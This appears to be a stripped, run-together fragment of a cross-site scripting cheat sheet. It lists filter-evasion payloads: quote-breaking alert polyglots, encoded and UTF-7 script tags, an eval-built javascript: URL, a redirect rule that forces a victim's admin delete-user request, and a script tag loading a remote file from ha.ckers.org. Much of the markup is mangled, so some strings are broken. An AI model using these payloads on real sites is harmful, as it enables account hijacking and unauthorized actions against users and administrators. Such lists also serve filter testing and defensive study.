';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//-->">'>=&{} '';!--"=&{()}

Redirect 302 /a.jpg http://victimsite.com/admin.asp&deleteuser exp/*

XSS %BCscript%BEalert(%A2XSS%A2)%BC/script%BE a="get"; b="URL(""; c="javascript:"; d="alert('XSS');")"; eval(a+b+c+d);

XSS ]]> alert("XSS")'); ?>
< %3C < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < \x3c \x3C \u003c \u003C
+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4- \";alert('XSS');// perl -e 'print "";'> out perl -e 'print "&alert("XSS")";' > out ">
PT SRC="http://ha.ckers.org/xss.js"> XSS XSS XSS XSS XSS XSS XSS XSS XSS XSS XSS XSS XSS XSS